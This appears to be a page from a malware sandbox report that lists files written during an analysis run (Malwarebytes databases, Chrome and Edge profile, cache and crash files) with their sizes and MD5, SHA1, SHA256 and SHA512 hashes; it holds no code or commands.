3478f5dcf7af549dd6fe48ad714604200de84a90120b16a32233b6d44fa7240f5f4e5fe803f54b86bbdfd10fa1bfdd88fb85eb6a78e23e426933f98d0a2565ec

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\rdefs.mbdb

Filesize
24B

MD5
2f7423ca7c6a0f1339980f3c8c7de9f8

SHA1
102c77faa28885354cfe6725d987bc23bc7108ba

SHA256
850a4ea37a0fd6f68bf95422d502b2d1257264eb90cc38c0a3b1b95aa375be55

SHA512
e922ac8a7a2cde6d387f8698207cf5efbd45b646986a090e3549d97a7d552dd74179bd7ac20b7d246ca49d340c4c168982c65b4749df760857810b2358e7eb69

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\rules.mbdb

Filesize
9.8MB

MD5
71105147a7371e1fbe5939f0de09c2fb

SHA1
07bd3eebed0bd1eb8099db004234e7c6debaeaea

SHA256
c0412ef552a4d4d3dbee5acc587182489ae09079c35451b7c3cfa9276ad46a88

SHA512
b9680a2406040af20e4d59d17985798cd1983ba5c87eec36dba810572648180d3ecb5f9d59a13526c9645852f28f05ad577779beb591753ac82b6849be2cc38f

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\sample.dll

Filesize
528KB

MD5
ad5afe7fe3eac12a647f73aeb3b578bf

SHA1
29c482e6b9dd129309224b51297bff65c8914119

SHA256
7d2c7bc745e07d54f1c26c06d7438eb40ec6f5d17dfa15928b67d447f4c63747

SHA512
5be9f8384cc22bb7d69d8e532e7025675db16777b2d01ca1819a6e3d8c7daaaaa23d842d338d55d74eb9973e230a8f9a11ce7524667fee09b18fbdcb5a49289f

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\scan.mbdb

Filesize
868KB

MD5
ee6bbd6ecb5d7b2fab296f58f7662995

SHA1
f438eabc5bb5adf4411fea15c6e2aa2af2c7ab64

SHA256
5234ad0dbb33614a2f67376df69df8d05fce41782a8d6af718acb99b10e38d37

SHA512
42e68727b7c3f216af64afd4ce3d41ff364c506a931996304560e48a89b92bcf25f8ad895a2d22eb5328e359f24d4c5747015af06ab38f0b26c9d95e27025cea

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\tids.mbdb

Filesize
169KB

MD5
a9383541419788beef83a17be662bb65

SHA1
12ae7bbdebd4455f72b12886e063ee908056164f

SHA256
8cb87709cd62a92a6d11bb6706c0e7b5d69f1144ceb73795ff0c3c7ecc69a0e8

SHA512
10dcdf8ae2fa2600bc7b7f8ec1ff3014452d26e2a155f055b2c2104f5fb115efbcee58ba5487be5f9beb6504fae203a085ebf94fe6007a2f83774cf74dbfe29c

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\version.dat

Filesize
26B

MD5
f190e5ccee61c3fb33ed3f79b759f1a7

SHA1
29478d02baa87d9c64fd1712c7982e78eedcb678

SHA256
a241df2ae6e37da9b53386ab8faa46599c4142109d8243e620caf3a615b9ec22

SHA512
7ec12ee698dad416b2bcbe0b6e03ec88599ae4ab0469355ab1b74556c59f65d369fe2ed8e4910acf11eb236a837c93b798387528613aa47dd36bcf6cbdf8e5ae

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\wprot2.mbdb

Filesize
25.2MB

MD5
4fe15ba9447092b2a205b02f0121bf61

SHA1
aabb4bc39e811b07154db18886b17a9bac78a0f1

SHA256
04884f1c1b94fd35c9fea16739bc4eaed271f1647bc2242ebe5df35891c2703b

SHA512
d028ac93d290d4da626756d3364614318469ab662161ebe873a37e3930c89a00881463770e1475c252ca0cd6d1cdb2a2b2944739695c402f967238662eb204c3

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\wprot2.mbdb

Filesize
25.2MB

MD5
b51c4f3a3193d001b667a9e4db633cf1

SHA1
1b0597e329b7722c9fb20fd686b6e1a30aca6428

SHA256
807c94a5d1d4a394c4430b717aa31401e0c6aedaccd38301aa5e076a6b5804ab

SHA512
cc1dfd8537d98dafad49be04fa8065a8be973102d3204e375432a1b168751e8d67ad7a52dd4470559a9e6ccca84d6eaf1e551aeecde1735e67e07efa0e5cc168

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\pkgvers.dat

Filesize
75B

MD5
1723f3387d3f79cfb593a887c2e71c1e

SHA1
2e80de57076e6c5936c6bb39f900a7883adce9ce

SHA256
de3a5daabe73bd411f00c581679ea8e1547d5a47ddb5ee27820666bd23ab5abe

SHA512
6cd51ebe67df433d43224af1b60bbc5e7418f99eecc79eb01cc5cced4fd33e7cbf19c85ae7a8a9af1cd3d6e44b331a1b74a94c44817923faa12e3fb7fbe790bf

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\rules.mbdb

Filesize
9.8MB

MD5
f14b7d1d74e307369abcf7aba622365c

SHA1
492153b225fcd4c7a50ab97de6589dcd6f6731c5

SHA256
707892df49e54fa9f1837ae80ca7fd2f8f9b19268737f70c8dd9caf036b0817e

SHA512
bb8bfc8b05fca9c07108198fe0d56889addb4895a19962f0d3376e332a65d1d2da006f5c1b53881101485acc3564105ebb1555afe50c19503044bc9e78ab306f

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\tmp\6f6bbc4e3fb211efb84ceefa7036a957

Filesize
8KB

MD5
6c5d7d87941bb552b9dd52a1e342d53b

SHA1
eb418585768a5230cea4133eb6aef943f6d9eb53

SHA256
807fd1add14dc5c9f6dcb58473d18d9ab97670c6120ac748233e736724480471

SHA512
013ec558389c9a6648528b33e945e7dcc1b4741ef9292158efd95af8674cd9ca6275a14538d62b32c942876c785a6a4486f90a1398bc86571c287c26bb494c74

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\tmp\dac11b383fb211efaf7feefa7036a957

Filesize
8KB

MD5
34ba70877396f7db38fe058254c50464

SHA1
1b62c6202c4827960678630d9e0adb0481ac8698

SHA256
5b7e210a150e10f914a9f7dd64de6cc8bb7bd24bbf56a8908d7a72a93a6a79d9

SHA512
a62fa96fff97b20cc871ebd8bb75e08404d990b9f4e6ef6c2c26008f1c6bf1954aeabba034b8b1dc16c8b87a758de36240c2abd98fbef315b52d2f5312cf7d41

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\updatrpkg\SdkDbUpdatrV5.dll

Filesize
2.6MB

MD5
52c4aa7e428e86445b8e529ef93e8549

SHA1
72508ba29ff3becbbe9668e95efa8748ce69aa3f

SHA256
6050d13b465417dd38cc6e533f391781054d6d04533baed631c4ef4cea9c7f63

SHA512
f30c6902de6128afbaaed58b7d07e1a0a674f0650d02a1b98138892abcab0da36a08baa8ca0aba53f801f91323916e4076bda54d6c2dc44fdad8ab571b4575f7

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\updatrpkg\mbupdatrV5.exe

Filesize
5.9MB

MD5
dadd3a87f25d03de63068f453a577cb9

SHA1
4f7644e11c9000fef804a20b9035658b43dab5ab

SHA256
6c503e2471d74114d605afe2df91936782dd121581b653af25a18600e1aae0f1

SHA512
f1c4e354737c165e21cd36acf37a79c7b23cebbad9b940494fd26ccee5c652e570de55323d7e315cdccca1f7757a625c68678445864afda7d12c3758d8ad9021

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
d4ff3603ae1515f18f286a39197cea53

SHA1
93cc9863a19d881501cc056f7d8ea709a8efe4a9

SHA256
26e8881dd0ec0b294ee2bc487c7205ac460f7d85c3d9944337c2d3762ab32d7a

SHA512
cf8f42798e6aff6952cbc49bfc928179d88035c9c29d52149ec918d4393bdfa94450dc7134bcef5e32bf5878098584e1da0dbb60432352c5c13c1f2dbbe4c4cf

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000002

Filesize
24KB

MD5
c594a826934b9505d591d0f7a7df80b7

SHA1
c04b8637e686f71f3fc46a29a86346ba9b04ae18

SHA256
e664eef3d68ac6336a28be033165d4780e8a5ab28f0d90df1b148ef86babb610

SHA512
04a1dfdb8ee2f5fefa101d5e3ff36e87659fd774e96aa8c5941d3353ccc268a125822cf01533c74839e5f1c54725da9cc437d3d69b88e5bf3f99caccd4d75961

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
144B

MD5
dcdc369f8910ac93f77e8cdc9f9b7a43

SHA1
370ca6b4b817ee8b795b6ab96ac9327468f33483

SHA256
5a49138f856e1027e044d459e87df40b4798bdd73821de2f09cbedc11895d088

SHA512
fdcc427b6dd222e9a983970095c5b8206e0d62b6681a80fc1dd002cc7b1d48f22a64f0c4616b1493df7c28ce84970582b7e8c36e14707636dd660cc5e2a3b534

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
7cd6e557be95b38184a3f49c4e2644ae

SHA1
14496666170ba162fe6ae9131995b1d3e58ac7ef

SHA256
017cd572ae5e3b022e8df84c5debf8eee56996d165cd31d0abf00d3c9eed39f5

SHA512
286518a3e59ab27b05e87d1a1975edfa3af354d43de3b734e4cd5c6d97a325fd5abc15361f052f2fa4d14c30569ab8a2693191ffd277c78c518fc1ba05cf0dca

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
2d5d191d1662f9262fb97180417f75ac

SHA1
87613e68362144864f5e34168f5aaa158cbcaa87

SHA256
d4d94372eced82f4942a9f88094e024a444efeffdb39136c91f7771bef5bc50d

SHA512
dc874f007b521f8dcebb480044dd377e53291b4030de93ed6c504a2f28c2f4e5b6a1564cec354b103f70bade24a0d81ad0fe4394a2aa3a96774313f9bafa402a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
9dd5cfb259b2cee11c1907d86ae8a537

SHA1
51e878e0663ce4191743ad93b074259594483b22

SHA256
4aca06fe8c1abffb6993770698dadf6ba36b2a9cbebd82b84ef86a931ae737fa

SHA512
ed78f12457a83991e7d8ed058963476b571f7023f77517806683392d485042f1fcc2957387f04c94e2399ede747a9e46cb854d2159dc4569c08f85dee5b2dce7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
2688edab97d5df4ec86744660bb79c2e

SHA1
76070634ba45ab079871063962ac446a8fd92b58

SHA256
c0ce5bfacc75243dafb3e8c5838aa0cc8b54b40920183b3021df38017d90a121

SHA512
2de4f0deb802d78eabe21d59b6304b063601eb1b6ba141c4d7fbc552f3298fde315711e0e2369ded14879a9122b0fa1cc85c5a42daaa521afe155817b7eb7b2f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
f9f3cbc91d424a94b86f4f11d705d6b6

SHA1
c77bc8f1a0c2292d4cdde960995f35effe56cc37

SHA256
5cca110f87017272111623169242209946e4dc9a16f5dba6dc058c02a2e1d57c

SHA512
bc9248f7ffbcc6205e1f308cb66e70e7efac9470c22414478229a0cc76f9947b641102719a2df1f518a65d2f0244aa2a1a53c621c77dfbd217aba01050d18994

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
f7442922f28889058fd54730f9507d3f

SHA1
912fa0587de07e3fdbecf52aa48be3955066846f

SHA256
65d3448dc6c072f7a37e712a46189d19e7ffdf82a0fe7f0dd7622a06372def6c

SHA512
bafb63265a74bd04b05f719102a8c237865db526b2e5d39e132ba53ad7c5a78fe60657a09c7a68f61a8c78c04d8bb7c7056bd5e5f34b4e9a188673f8e9f3546b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
4d0e5931235d2f2bb89992278ffca543

SHA1
bb0c460bf6181099e2f25c64886a43d969d3a82a

SHA256
00c4f04cfb13a6409826707f5ac773f46de5c7a25a92c4959db9195e38b8d993

SHA512
e650507d1d97bed5ffc54922257f74a6e5226bcfdc936e0a8af75d863efe7b3aba251477da76a24ae408abad16b9d40b4fff79b70d9aeb8a68140bbdb99f5fe5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
e007d511d11632f6d212fea1efd69d3a

SHA1
55e1f1f7a53955b72a12a681210d6aacf595cde4

SHA256
daa1794d3b06fecec62d81a5ff485eaa926224f64eb643b1971576d1a50718e4

SHA512
633f8d7b02db1f6d5dbc1b997a0281f6340f1fe55e7de2d65d5a5e31a690b2871f706b61ab9807547ed16b38a270afbb0f6ed4d53f35769e4cf1b0d23bc9f4b0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
75e35cffc04a9791624107fb2ca0a853

SHA1
435219c6ec771524f2df9bc5f54d959039d3f0ed

SHA256
9c00464ae02fc546c40c927c20bb3e37bc7f0314413bc2b74da0849fe4300d31

SHA512
a40d1261eb18e226ecef23192c02ebd6bd6372439f1e2cfca7d5cf9e2c2c966850a531b7408c325216e3605fa502103a7b95131c63f4f2f19c722b7a2b559fc0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
e8ee118251c4cd8e70ec7ede25cce48c

SHA1
c29f557bff53afd82f5d179a53de591c4633c05a

SHA256
c29b64117ec7d104cea7c2f40398b691daa22c193c40e1158ef44c6cff7de03b

SHA512
ba6c2e1f570197b9abb6b136174256d116368170fb6a8a5eb79c078ff47fd18ce44173135c723befd367c30e00a58e4cdf983d61c73ea9776f6fbd4be14735b7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
dd95578153593f9a33f1d2af3966fbd5

SHA1
a19c31b424f07141b011462ac29dddaa7d5cf5e6

SHA256
dc480dd82f325534d5e2b8cc96c8800a43f935ba9ba269603cf99a1fd9fb954c

SHA512
de82a0c5156bca009dbecaff2191bb3049cdda83677d511e4c107a29cd7abae7b97cdeab5f1367f7480868bf05ef15d498cf67e3429a1c675907a4615354a7a9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
1925074ca05730f0b8dea8f1dc573218

SHA1
189f68c9cf1168829f475941bd812c9a4ea8b9ce

SHA256
9749d99c6a4cd8deaecf5a786e3090b97801008f2d34323e198c2c19da940889

SHA512
5971b0a9e96ef69b083b88f592ab7fdbbfdcf66764de38356922e15438e2f00e4c488eff02692b0e57687ca2f27046908ae6a8eace71b0ce6e53a47396ad656e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
4fa1a4ddf59dbbc50072ab0431896c89

SHA1
1f632f64a8f2ea694fb256c0720ea10bd77983f4

SHA256
7d084701d0b95e3d9567d7562ddd4b7f044c356e5f6efee67e0a78cc611ecba8

SHA512
5c2a529c02ea0a92e3f9e9a4ce77723a34917d2bbada84913e0e4482f1da66b13c55614ce7bb8ac10fb6b9a260942a2394bac3bbe3c1f62f97b16cd4d96184a9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
c4cb7d0028e293f0dee6678cc119848d

SHA1
41c257924d61ec4a00b9e43bc68aee4d9576c42a

SHA256
e11fe12b59bffd6071d5ed4912afbd62846c83a7cc89b73fc3a6cc0a3966ecd8

SHA512
583f0cca531c4bc9d979e8c5022a8f7b0c282189931adf6f14b47409789ed53da86c792e83009e5b2d451179b148a2fc5305838aaab02ad4dc3e79424710433b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
da4118e460068724374ff8a4ac3d9921

SHA1
f73c5fffd94adc8e0589b0bd13e7bd1cc295fb76

SHA256
c52b41c49bc1cc71e5336a47a711a1d35f845fbdf1738911a1b13f69a2103531

SHA512
3b44787e2a2efd33f621440d6a6bce254d2e7aaea94ae2c61f302957913ebd13dfd98e01c9b3b7c2cd0f84fe4a401f782a06aa5cd742e51af1df098299895ca7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
db8cf349aeeac667f52adc0b33a48b8d

SHA1
2bf2e1c17dee552e6e981f31410dd6d2d63e3151

SHA256
5b2913b7982033304c4cde3511b8734a215a3e01614e705a0948cd9365b34996

SHA512
e5f8260d30c531ca6bed19fe9cf13774b6b93e1fcd80c7ce77e0fd28ee902a549f5a76d1d776c145cb9da07d4f4d92780114fc545b934b34afaeedbc1feb7dcf

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
a0b3de119ad2d3ca5018c64a6bf535d9

SHA1
b93d03d7f9d213425a947dd694c0f43857da6ddb

SHA256
5a443b2b78a4f25e05b2a8a95eff654f8b65699be23d956de30963c5ea0e3f5c

SHA512
fa9c483adca33566dc7b21065e6e968edd7614b151016fe30237fba4a477e717b23d1ffcd952a453d7103365686d8b7adee5af5af49e24438438ab66a6aa4207

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
16KB

MD5
e8253847b7806952f0b4119819df9338

SHA1
51f0e07c235bced833c3dd545e4efed743e07c6e

SHA256
c935e3a9228c051f70e83e31242369c6e0a7132c18d5eb9da03058ab43a5ee51

SHA512
8d2df933a2984ab740fc69440d2970f1ad6832dfca786cfb34dd1e160a2af08b95bae5b81a5311dc447131a427dfefcd9987cf5a86f989c1a4069a52b11c8b87

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
285KB

MD5
1dbe77a56613ba90173f7b8a04c790f7

SHA1
7437b5053f1ef0e401d726bfe21723affad1ff6c

SHA256
e32b4fde7c71b8febc0063ebec03d251d8160441ca9c75b596c8ae7fed5ffa1c

SHA512
000124f7146cdb344fd32bca6cdb03eb87dd3a59d15f67d77718908f049ab1574acf78157910e0d7fbfd788f5f12d91d5f026b0c9534639ff59160f9048e8a1b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
144KB

MD5
e8fbf02e064aba37fd50fda7ab49618e

SHA1
5412cc3ba053399fc114c167781d114599db780f

SHA256
72dafce2833cbb0741cc611dac368161624d124513ebac0c10b78a044828922f

SHA512
842c45fcae5336549888c0401196e6de9a77458eedabee7e2ffe276a492c211f89c8c2a24fc2597d637969cc6ac84953a4b2c35c346353bd93335d8bf97cbce4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
144KB

MD5
cbebf29164ec830dd96c515fcd728956

SHA1
8b6c5e8517944f28707c445727dd519e62a188fb

SHA256
fdf70683e83ee04f82ae35c1f8ac7ffb43f38d61e2cb2023e0259712c18c0d63

SHA512
7bbfd4ceeae948bdffee364b80b09e4a0fc509f81794062804d12cd66c946456e00bef78a94f8b98e0b34f4598c9c9ed01404a98a001e06277624d5c8aec660b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
144KB

MD5
7657fd376e5c1b89c08c9b8a3adad8ae

SHA1
55096f037ac98effebe4f982ac66254df7b46fdd

SHA256
a96f01cdc172895863595b89f35b68be7f32ba41fa429763237159003ad97246

SHA512
2d6129685bd6ba138263b12190af018a712db9fb812be97da731e5a89c5bada4bd65b83593c4346ccf71fdbeccfdc86496455418e877834f54e3d034c097bbeb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
144KB

MD5
2cc6293ce9116ae6a12a353f1562b4dd

SHA1
b6f8fd36a01429052d5268237b696ac063b4aff3

SHA256
13a608086a3bd7a1110c824dc7168cc3e84d24f1e50d011abc37a3f38e09a60c

SHA512
44da4ab8bb1de82768329c6abec308583c661db983253a04bae6727fb849069418fcca10132f35ed524d180df5f603a74d5478255646c4bd898905754e38fb20

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

Filesize
150B

MD5
71c3b568c609950b6dcf5290d00b9207

SHA1
e2a1f2d9ffe68710c7c291cec79fdac0d00ec18d

SHA256
96281d578e9c046cc24b62fe0044379cc7dea139e3f45c1b07c0767510f7a28d

SHA512
a69215d20ba60e4f18e3c92b4599e1a1389f7362e72000bbd515764b5d3d81c80a927ac4f463f6eb16fa896c8ab95818e39d84e312de858864632b1211787460

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\93458b66-9fd9-4773-81c7-7e60445aa02a.dmp

Filesize
221KB

MD5
de6bdf0d5203cc0c50bdee7e2dcc62f8

SHA1
bb97523cb689b9eebf6f3cb4587716b65a57f556

SHA256
8e4f0bf8340d01269d41517204628455b69c0154398f74fdc90ccc2837d50ed0

SHA512
cf5708d6b685bd0c6c544c59c94c7ee018c01d9044397ae71bba8443f13e55e6d59765f9aa07333e2dcfd34a55371c12fe04a9561aa6a96cd3079820879ff0da

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
d74214aa067d86cc71edf48290d7bfb5

SHA1
e41c7822684cb5bbd2f440ed61547cf00a7895eb

SHA256
9490f4747c458f92a0e0ccf4115a35b82adbbcabcff7147827cd65861a97dd7a

SHA512
60daac4a41ac21aa4db497943d0ed29ba2ed8a83bab165c2677a2b70b5afdb805964bbfa05c5176aee9fab28066af9b69010cec226a8f2632be366ae361118e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
a501deb9d32ef56201ef460174f818aa

SHA1
2b66cfc4e1406fc7b4967f42de284d36599294c2

SHA256
cafc79f456deafd2365cdbc4c35e6b5e90162e4398fec8edd1c9dadc7f2b9cb5

SHA512
33c28d62314ebfa8d0734f814e06488c81a960f9f637b1eea1681c199ad920de222bc2739a6bd0dcf6050b2c0c19854dc9e8c7f08cfcd981932b03f8f1ed45a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
f4e6521c03f1bc16d91d99c059cc5424

SHA1
043665051c486192a6eefe6d0632cf34ae8e89ad

SHA256
7759c346539367b2f80e78abca170f09731caa169e3462f11eda84c3f1ca63d1

SHA512
0bb4f628da6d715910161439685052409be54435e192cb4105191472bb14a33724592df24686d1655e9ba9572bd3dff8f46e211c0310e16bfe2ac949c49fbc5e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
210676dde5c0bd984dc057e2333e1075

SHA1
2d2f8c14ee48a2580f852db7ac605f81b5b1399a

SHA256
2a89d71b4ddd34734b16d91ebd8ea68b760f321baccdd4963f91b8d3507a3fb5

SHA512
aeb81804cac5b17a5d1e55327f62df7645e9bbbfa8cad1401e7382628341a939b7aedc749b2412c06174a9e3fcdd5248d6df9b5d3f56c53232d17e59277ab017

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
9592c118b2e310d130af904d2ac6adb5

SHA1
d3419615375823e14631a8edc6118971019f6152

SHA256
17abe206f03ab42a94745750680e46b0fd2f6d60f94fb38514d9bc2f0b341d37

SHA512
dcabdd33a5f0344d9c033c585fe82e66b96c6e2224420ea4e219def35ed27ab5ddb244d95f586e71e69c750308a70966386017be59aa5633d1a7ac8db6d2d3fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
3792cb275c6aa489b5bbaeb853dfcd4c

SHA1
47ce4985da2ca417be4e73051f36b639590b1031

SHA256
e5ffd3992eb03ff63e5468e7faa3f918dc52f74eeda9de181bdcad36a9efe7a0

SHA512
e9466c8928ef0eb63e297c0c8b67e42197b2410b9ca1c717c08bfe608483c34d9e5cde6aaf9fd03e47d9c1928a28da4afdda1920d7563349df231f40879cbdd2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
ace3bff8ff68a8c64d000a3d5d9c7fa3

SHA1
7cf4c4e1430478a6a99c6211142ec96ac552fea9

SHA256
08cd1b825ede2c353446822eaf2f2ba03fc9228dd208b820fddd38ed2d52202e

SHA512
befe9beebdaf19242cd00a6c9f41f864d8eea8f144335525a7b93237fe45f55aca448188fcb19d9e3b7dd977a25c862517621bc3aa2978149529d508d032ab63

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\66144bf4-9590-4995-9a7d-70e8722444c6.tmp

Filesize
12KB

MD5
b4492ef26debbcc1e4726e789345571f

SHA1
1d324c29d82071887425d2539bafccc380253c4e

SHA256
e392679542bb3338d89b8562afe46ad356d5e0782d1e2259384c4344930aa8c1

SHA512
1ab69182c95e93bb93670b4dab083c18d42026c8d539db1da4b651f485f433838c2836f6430fb6a96339ad83100bb29a95a181b30426b840b2ed9767601719b4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\699d241b-095f-4767-a000-fbd1c60bdd66.tmp

Filesize
9KB

MD5
a2f56a416ccb1d661f2a36443e581179

SHA1
4b0eefb16ffb3c5654771e5cf36e0475da2628fa

SHA256
b92ae837d254798a623d8139456b552dcc5b3cae63e6c4402499932ecd8af38b

SHA512
b8a627f697d7bf22fd6571a52e22cbea2f0cd20c5d1cd784ffee1258540022322a8fbf364922cea1466d97880eb4e4e978f440aa7d221327a35294b51dd4ed65

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\9cae4544-0ed7-434e-83d6-16cdea336513.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002

Filesize
64KB

MD5
d6b36c7d4b06f140f860ddc91a4c659c

SHA1
ccf16571637b8d3e4c9423688c5bd06167bfb9e9

SHA256
34013d7f3f0186a612bef84f2984e2767b32c9e1940df54b01d5bd6789f59e92

SHA512
2a9dd9352298ec7d1b439033b57ee9a390c373eeb8502f7f36d6826e6dd3e447b8ffd4be4f275d51481ef9a6ac2c2d97ef98f3f9d36a5a971275bf6cee48e487

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003

Filesize
41KB

MD5
ddb12152235627d79d91205d518ca3b8

SHA1
ffb693be91d5489410e1e3df1026c8696f54aace

SHA256
8280f3b8757419a41cfc842bebb61cd15e98aebd64400cd4075e7b4a7af9231f

SHA512
478d4a236fa688ff043abd63f2cd18d42cef48be1b6a78e46f5d48dc666f68e8292a0dcdcfa9172236307ba62052d7ad50970cdb5afd3a137c38896ec2b15a61

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

Filesize
69KB

MD5
7d5e1b1b9e9321b9e89504f2c2153b10

SHA1
37847cc4c1d46d16265e0e4659e6b5611d62b935

SHA256
adbd44258f3952a53d9c99303e034d87c5c4f66c5c431910b1823bb3dd0326af

SHA512
6f3dc2c523127a58def4364a56c3daa0b2d532891d06f6432ad89b740ee87eacacfcea6fa62a6785e6b9844d404baee4ea4a73606841769ab2dfc5f0efe40989

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005

Filesize
19KB

MD5
76a3f1e9a452564e0f8dce6c0ee111e8

SHA1
11c3d925cbc1a52d53584fd8606f8f713aa59114

SHA256
381396157ed5e8021dd8e660142b35eb71a63aecd33062a1103ce9c709c7632c

SHA512
a1156a907649d6f2c3f7256405d9d5c62a626b8d4cd717fa2f29d2fbe91092a2b3fdd0716f8f31e59708fe12274bc2dea6c9ae6a413ea290e70ddf921fe7f274

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006

Filesize
63KB

MD5
710d7637cc7e21b62fd3efe6aba1fd27

SHA1
8645d6b137064c7b38e10c736724e17787db6cf3

SHA256
c0997474b99524325dfedb5c020436e7ea9f9c9a1a759ed6daf7bdd4890bdc2b

SHA512
19aa77bed3c441228789cf8f931ca6194cc8d4bc7bb85d892faf5eaeda67d22c8c3b066f8ceda8169177da95a1fe111bd3436ceeaf4c784bd2bf96617f4d0c44

Download Submit
